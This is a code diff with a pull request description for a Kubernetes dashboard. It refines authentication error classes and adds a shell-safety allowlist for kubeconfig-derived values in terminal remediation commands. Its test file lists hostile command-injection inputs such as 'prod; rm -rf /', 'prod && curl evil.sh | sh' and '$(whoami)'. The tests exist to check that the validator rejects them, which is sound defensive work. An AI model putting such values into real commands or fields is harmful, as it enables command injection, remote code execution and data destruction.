-        fallbackCommand: { label: 'If that does not work, refresh cluster credentials:', command: 'az aks get-credentials --name <cluster> --resource-group <rg>' },
+        fallbackCommand: { label: 'If that does not work, refresh cluster credentials:', command: 'az aks get-credentials --name <cluster> --resource-group <rg>', runnable: false },
       }
     default:
       return null
@@ -182,7 +270,7 @@ const errorHints: Record<string, { title: string; hints: string[] }> = {
   },
 }
 
-function CopyableCommand({ command, onRunInTerminal }: { command: string; onRunInTerminal?: (command: string) => void }) {
+export function CopyableCommand({ command, onRunInTerminal }: { command: string; onRunInTerminal?: (command: string) => void }) {
   const [copied, setCopied] = useState(false)
   const commandParts = command.split(/(\s+)/)
 
@@ -232,15 +320,28 @@ function CopyableCommand({ command, onRunInTerminal }: { command: string; onRunI
   )
 }
 
+export function selectConnectionHints(errorType: string | undefined, context: string): AuthHints | null {
+  switch (errorType) {
+    case 'auth':
+      return getAuthHints(context)
+    case 'auth-rejected':
+      return getAuthRejectedHints(context)
+    case 'auth-plugin-stuck':
+      return getAuthPluginStuckHints()
+    case 'timeout':
+      return getTimeoutHints(context)
+    default:
+      return null
+  }
+}
+
 export function ConnectionErrorView({ connection, onRetry, isRetrying }: ConnectionErrorViewProps) {
   // For auth errors, generate context-aware hints with a specific re-auth command
   const isAuth = connection.errorType === 'auth'
-  const isTimeout = connection.errorType === 'timeout'
-  const commandInfo = isAuth
-    ? getAuthHints(connection.context || '')
-    : isTimeout
-      ? getTimeoutHints(connection.context || '')
-      : null
+  const isAuthRejected = connection.errorType === 'auth-rejected'
+  const isAuthPluginStuck = connection.errorType === 'auth-plugin-stuck'
+  const isAuthError = isAuth || isAuthRejected || isAuthPluginStuck
+  const commandInfo = selectConnectionHints(connection.errorType, connection.context || '')
   const errorInfo = commandInfo || errorHints[connection.errorType || 'unknown'] || errorHints.unknown
   const openLocalTerminal = useOpenLocalTerminal()
   const { data: authMe } = useAuthMe()
@@ -316,8 +417,8 @@ export function ConnectionErrorView({ connection, onRetry, isRetrying }: Connect
             {commandInfo?.authCommand && (
               <div className="mt-3">
                 <p className="text-xs text-theme-text-tertiary">{commandInfo.authCommand.label}</p>
-                <CopyableCommand command={commandInfo.authCommand.command} onRunInTerminal={handleRunInTerminal} />
-                {isAuth && (
+                <CopyableCommand command={commandInfo.authCommand.command} onRunInTerminal={commandInfo.authCommand.runnable === false ? undefined : handleRunInTerminal} />
+                {isAuthError && !commandInfo?.hideAuthButton && commandInfo.authCommand.runnable !== false && (
                   <button
                     onClick={handleAuthInTerminal}
                     className="mt-3 w-full inline-flex items-center justify-center gap-2 px-3 py-2 text-xs font-medium btn-brand rounded-md"
@@ -331,7 +432,7 @@ export function ConnectionErrorView({ connection, onRetry, isRetrying }: Connect
             {commandInfo?.fallbackCommand && (
               <div className="mt-4 pt-3 border-t border-theme-border/50">
                 <p className="text-xs text-theme-text-tertiary">{commandInfo.fallbackCommand.label}</p>
-                <CopyableCommand command={commandInfo.fallbackCommand.command} onRunInTerminal={handleRunInTerminal} />
+                <CopyableCommand command={commandInfo.fallbackCommand.command} onRunInTerminal={commandInfo.fallbackCommand.runnable === false ? undefined : handleRunInTerminal} />
               </div>
             )}
             {connection.error && (
@@ -381,10 +482,13 @@ export function ConnectionErrorView({ connection, onRetry, isRetrying }: Connect
             {connection.errorType !== 'config' && <ContextSwitcher triggerName="Switch context" />}
           </div>
 
-          {isAuth && (
+          {isAuthError && (
             <p className="mt-4 text-xs text-theme-text-tertiary">
-              Radar re-checks in the background and reconnects once credentials are
-              refreshed. Use Retry Connection to check immediately.
+              {isAuthRejected
+                ? 'Radar re-checks in the background — access changes are picked up automatically. Use Retry Connection to check immediately.'
+                : isAuthPluginStuck
+                  ? 'Radar re-checks in the background and reconnects when the credential plugin responds. Use Retry Connection to check immediately.'
+                  : 'Radar re-checks in the background and reconnects once credentials are refreshed. Use Retry Connection to check immediately.'}
             </p>
           )}
         </div>

--- a/web/src/context/ConnectionContext.tsx
+++ b/web/src/context/ConnectionContext.tsx
@@ -10,7 +10,7 @@ export interface ConnectionState {
   context: string
   clusterName?: string
   error?: string
-  errorType?: string // config, auth, rbac, network, timeout, tls, unknown
+  errorType?: string // config, auth, auth-rejected, auth-plugin-stuck, rbac, network, timeout, tls, unknown
   progressMessage?: string
 }
 

--- a/web/src/utils/shell-safe.test.ts
+++ b/web/src/utils/shell-safe.test.ts
@@ -1,0 +1,55 @@
+import { describe, expect, it } from 'vitest'
+
+import { allShellSafe, isShellSafeValue } from './shell-safe'
+
+describe('isShellSafeValue', () => {
+  it('accepts the values real provider context names produce', () => {
+    expect(isShellSafeValue('prod-cluster')).toBe(true)
+    expect(isShellSafeValue('us-east-1')).toBe(true)
+    expect(isShellSafeValue('europe-west4-a')).toBe(true)
+    expect(isShellSafeValue('123456789012')).toBe(true)
+    expect(isShellSafeValue('my.project-id')).toBe(true)
+    expect(isShellSafeValue('my_project_2')).toBe(true)
+  })
+
+  it('rejects shell metacharacters', () => {
+    expect(isShellSafeValue('prod; rm -rf /')).toBe(false)
+    expect(isShellSafeValue('prod && curl evil.sh | sh')).toBe(false)
+    expect(isShellSafeValue('prod$(whoami)')).toBe(false)
+    expect(isShellSafeValue('prod`id`')).toBe(false)
+    expect(isShellSafeValue("prod'quote")).toBe(false)
+    expect(isShellSafeValue('prod cluster')).toBe(false)
+    expect(isShellSafeValue('prod>out')).toBe(false)
+    expect(isShellSafeValue('prod*')).toBe(false)
+  })
+
+  it('rejects control characters, which a PTY acts on before any shell parses quotes', () => {
+    expect(isShellSafeValue('prodid;#')).toBe(false) // ETX cancels the line
+    expect(isShellSafeValue('prod\nid')).toBe(false)
+    expect(isShellSafeValue('prod\rid')).toBe(false)
+    expect(isShellSafeValue('prod[A')).toBe(false)
+    expect(isShellSafeValue('prod')).toBe(false)
+    expect(isShellSafeValue('us-east-1\n')).toBe(false)
+    expect(isShellSafeValue('us-east-1\r')).toBe(false)
+  })
+
+  it('rejects values whose first character the shell would expand', () => {
+    expect(isShellSafeValue('-rf')).toBe(false)
+    expect(isShellSafeValue('~root')).toBe(false)
+    expect(isShellSafeValue('=ls')).toBe(false) // zsh equals-expansion
+  })
+
+  it('rejects empty and absent values', () => {
+    expect(isShellSafeValue('')).toBe(false)
+    expect(isShellSafeValue(null)).toBe(false)
+    expect(isShellSafeValue(undefined)).toBe(false)
+  })
+})
+
+describe('allShellSafe', () => {
+  it('requires every value to pass', () => {
+    expect(allShellSafe('prod', 'us-east-1', '123456789012')).toBe(true)
+    expect(allShellSafe('prod', 'us-east-1; id')).toBe(false)
+    expect(allShellSafe('prod', null)).toBe(false)
+  })
+})

--- a/web/src/utils/shell-safe.ts
+++ b/web/src/utils/shell-safe.ts
@@ -1,0 +1,21 @@
+// Remediation commands are typed into an interactive terminal, so quoting is
+// not a sufficient defense: the PTY line discipline acts on control bytes
+// (^C cancels the line, newline submits it) before any shell parses the
+// quotes, and the Windows cmd.exe fallback ignores POSIX quoting entirely.
+// Values derived from a kubeconfig context name — which is routinely supplied
+// by someone else — must therefore be checked, not escaped: anything outside
+// this set means the command is not offered at all.
+//
+// The set covers every value real provider context names produce (cluster
+// names, regions/zones, project and account IDs) and must start
+// alphanumeric so a value can never lead with `-` (flag injection), `~`, or
+// `=` (zsh path expansion).
+const SHELL_SAFE_VALUE = /^[A-Za-z0-9][A-Za-z0-9._:@-]*$/
+
+export function isShellSafeValue(value: string | null | undefined): value is string {
+  return typeof value === 'string' && SHELL_SAFE_VALUE.test(value)
+}
+
+export function allShellSafe(...values: (string | null | undefined)[]): boolean {
+  return values.every(isShellSafeValue)
+}


### PR DESCRIPTION
## Summary

Radar previously classified every Kubernetes authentication failure as `auth`, so an EKS user whose request received HTTP 401 was told to refresh local SSO credentials even when the cluster-side identity mapping was the likely issue. Connection failures now distinguish local credential acquisition, Kubernetes API 401 responses, and wedged credential plugins, giving each state accurate remediation while preserving automatic recovery.

## What changed

**Classification and recovery**

- `auth` represents failures to obtain credentials locally, such as expired SSO sessions, exec-plugin errors, and OIDC refresh failures.
- `auth-rejected` represents typed Kubernetes Unauthorized errors and known API-server 401 response shapes. The wording deliberately says the request could not be authenticated; a 401 does not prove that the server recognized an identity.
- `auth-plugin-stuck` represents an exec credential plugin that times out while the Kubernetes endpoint remains reachable.
- All three states share the same recovery ownership, demotion, teardown, static-kubeconfig reread, Helm routing, MCP availability handling, and browser auto-retry standdown. Provider-specific copy is the only behavioral divergence.
- Proxy authentication errors and unrelated “provide credentials” text do not receive Kubernetes 401 guidance.

**Operator guidance**

- EKS 401 guidance covers missing/stale credentials and both EKS access-entry and legacy `aws-auth` mapping modes. Its diagnostic reports the current terminal AWS caller and the cluster authentication mode, with an explicit caveat when the kubeconfig pins another profile or role.
- GKE and AKS guidance describes missing, misconfigured, stale, or revoked credentials without implying that Kubernetes recognized an identity.
- Wedged credential plugins get a dedicated screen instead of a potentially misleading re-auth command.
- MCP errors carry the same distinction and explain that Radar keeps checking in the background.

**Terminal command safety**

- Values parsed from kubeconfig context names must pass a strict cross-shell allowlist before Radar offers an interpolated command. This prevents untrusted CAPI-derived or externally supplied context names from becoming auto-submitted shell input.
- Commands containing editable AKS placeholders remain copy-only; Radar does not auto-run them.

## Testing

- `make tsc`
- `make test`
- `make build`
- Frontend suite: 229 tests, including rendered auth-state dispatch, diagnostic/button affordances, hostile context names, placeholder commands, and control-byte rejection
- Go coverage for typed and string-shaped 401s, proxy-auth exclusion, Helm demotion routing, recovery ownership across all auth variants, classification-specific safe messages, static credential rereads, and hung plugins
- Visual test skipped: these screens require deliberately breaking live cluster credentials; rendered component tests cover the changed states and controls without mutating a shared cluster

## Notes

This touches connection demotion and recovery, so a misclassification could show incorrect advice or create competing retry loops. The auth-shaped states are centralized behind one backend predicate, full tests/build pass, and the browser continues to stand down whenever server-side recovery owns the episode.

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Medium Risk**
> Changes cluster connection classification, demotion, and recovery paths that affect every connect and reconnect; mistakes could mis-route outages or show wrong remediation, though behavior is heavily test-covered.
> 
> **Overview**
> Connection failures are no longer lumped into a single **`auth`** type. **`ClassifyError`** now distinguishes **client-side credential acquisition** (`auth`) from **HTTP 401 after the request reached the API** (`auth-rejected`), with exec-plugin stderr that quotes server errors still classified as `auth`. Typed `Unauthorized` and bare “unauthorized” / “authentication required” fingerprints map to **`auth-rejected`**. A wedged exec plugin with a reachable endpoint demotes as **`auth-plugin-stuck`**.
> 
> **Runtime auth** treats all three as auth-shaped via `isAuthClassification`, but publishes **fixed, safe status messages** and matching `errorType` per variant (401 vs invalid credentials vs plugin hung). Bootstrap connectivity retry skips **`auth-rejected`** like other non-retryable auth failures.
> 
> The **connection error UI** adds **`getAuthRejectedHints`** (EKS emphasizes access entries / diagnostics, not SSO-first), **`auth-plugin-stuck`** copy, and **`selectConnectionHints`**. EKS 401 can show an **`aws sts` / `describe-cluster`** diagnostic without the “Authenticate in terminal” button. **Remediation commands** only interpolate kubeconfig-derived values when **`allShellSafe`** passes; placeholder AKS commands are copy-only.
> 
> **MCP** `errNotConnected` messages differ for `auth`, `auth-rejected`, and `auth-plugin-stuck`.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 1d9c858114794f2e9a2646145f53123f36cd58f5. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->